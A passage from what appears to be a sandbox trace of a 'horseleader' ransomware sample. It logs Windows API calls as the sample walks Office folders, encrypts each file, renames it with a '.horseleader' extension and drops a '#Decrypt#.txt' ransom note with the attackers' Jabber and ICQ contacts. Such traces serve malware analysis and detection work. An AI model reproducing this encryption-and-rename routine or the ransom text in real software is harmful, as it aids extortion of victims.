Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\.") returned 100 [0244.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.420] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.420] wnsprintfW (in: pszDest=0x7dd078, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\..") returned 101 [0244.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.420] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e345a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="InfoPathMUI.XML", cAlternateFileName="INFOPA~1.XML")) returned 1 [0244.420] lstrcmpiW (lpString1="InfoPathMUI.XML", lpString2="Windows") returned -1 [0244.420] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 114 [0244.420] StrStrIW (lpFirst="InfoPathMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.420] lstrcmpW (lpString1="InfoPathMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.420] lstrcmpW (lpString1="InfoPathMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.420] lstrlenW (lpString=".testttjffg") returned 11 [0244.420] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 
[0244.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 114 [0244.421] StrStrW (lpFirst="InfoPathMUI.XML", lpSrch=".txt") returned 0x0 [0244.421] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1231) returned 1 [0244.421] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4cf, lpOverlapped=0x0) returned 1 [0244.423] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.423] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4cf, lpOverlapped=0x0) returned 1 [0244.423] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.423] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.423] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, 
lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.424] CloseHandle (hObject=0x15c) returned 1 [0244.424] GetProcessHeap () returned 0x780000 [0244.424] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.424] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.horseleader") returned 126 [0244.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.horseleader")) returned 1 [0244.425] GetProcessHeap () returned 0x780000 [0244.425] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.425] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.425] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.425] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 108 [0244.425] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.425] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.425] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.425] lstrlenW (lpString=".testttjffg") returned 11 [0244.425] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.425] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.425] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.425] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 108 [0244.426] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.426] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1852) returned 1 [0244.426] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x73c, lpOverlapped=0x0) returned 1 [0244.428] SetFilePointerEx (in: hFile=0x15c, 
liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.428] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x73c, lpOverlapped=0x0) returned 1 [0244.428] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.428] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.429] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.429] CloseHandle (hObject=0x15c) returned 1 [0244.429] GetProcessHeap () returned 0x780000 [0244.429] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.429] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.horseleader") returned 120 [0244.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.horseleader")) returned 1 [0244.430] 
GetProcessHeap () returned 0x780000 [0244.430] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.430] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.430] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.430] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\#Decrypt#.txt") returned 112 [0244.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.432] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.432] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.434] lstrlenA (lpString="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") returned 1368 [0244.434] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.434] CloseHandle (hObject=0x1a4) returned 1 [0244.434] GetProcessHeap () returned 0x780000 [0244.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.434] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6b277670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x8b7b8, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="ODeploy.exe", cAlternateFileName="")) returned 1 [0244.434] lstrcmpiW (lpString1="ODeploy.exe", lpString2="Windows") returned -1 [0244.434] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 95 [0244.434] StrStrIW (lpFirst="ODeploy.exe", lpSrch=".horseleader") returned 0x0 [0244.435] lstrcmpW (lpString1="ODeploy.exe", lpString2="#Decrypt#.txt") returned 1 [0244.435] lstrcmpW (lpString1="ODeploy.exe", lpString2="_uninstalling_.png") returned 1 [0244.435] lstrlenW (lpString=".testttjffg") returned 11 [0244.435] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe", lpSrch=".testttjffg") returned 0x0 [0244.435] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.435] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.435] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 95 [0244.435] StrStrW (lpFirst="ODeploy.exe", lpSrch=".txt") returned 0x0 [0244.435] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=571320) returned 1 [0244.435] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.436] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.438] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.438] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.446] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x433dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.446] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.451] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.451] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.452] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x867b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.452] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.454] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.454] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.455] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.455] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.456] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.456] CloseHandle (hObject=0x1a4) returned 1 [0244.460] GetProcessHeap () returned 0x780000 [0244.460] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.460] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe.horseleader") returned 107 [0244.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe.horseleader")) returned 1 [0244.464] GetProcessHeap () returned 0x780000 [0244.464] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.464] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 1 [0244.464] lstrcmpiW (lpString1="Office.en-us", lpString2="Windows") returned -1 [0244.464] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us") returned 96 [0244.464] lstrcmpW (lpString1="Office.en-us", lpString2=".") returned 1 [0244.464] lstrcmpW (lpString1="Office.en-us", lpString2="..") returned 1 [0244.464] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.464] GetProcessHeap () returned 0x780000 [0244.464] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.464] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*") returned 98 [0244.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.468] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.468] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\.") returned 98 [0244.468] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.468] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, 
ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.468] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.468] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\..") returned 99 [0244.468] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.468] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9fff00, ftCreationTime.dwHighDateTime=0x1cba028, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e9fff00, ftLastWriteTime.dwHighDateTime=0x1cba028, nFileSizeHigh=0x0, nFileSizeLow=0x3b78, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="BRANDING.DLL", cAlternateFileName="")) returned 1 [0244.468] lstrcmpiW (lpString1="BRANDING.DLL", lpString2="Windows") returned -1 [0244.468] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 109 [0244.468] StrStrIW (lpFirst="BRANDING.DLL", lpSrch=".horseleader") returned 0x0 [0244.468] lstrcmpW (lpString1="BRANDING.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.468] lstrcmpW (lpString1="BRANDING.DLL", lpString2="_uninstalling_.png") returned 1 [0244.468] lstrlenW (lpString=".testttjffg") returned 11 [0244.469] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
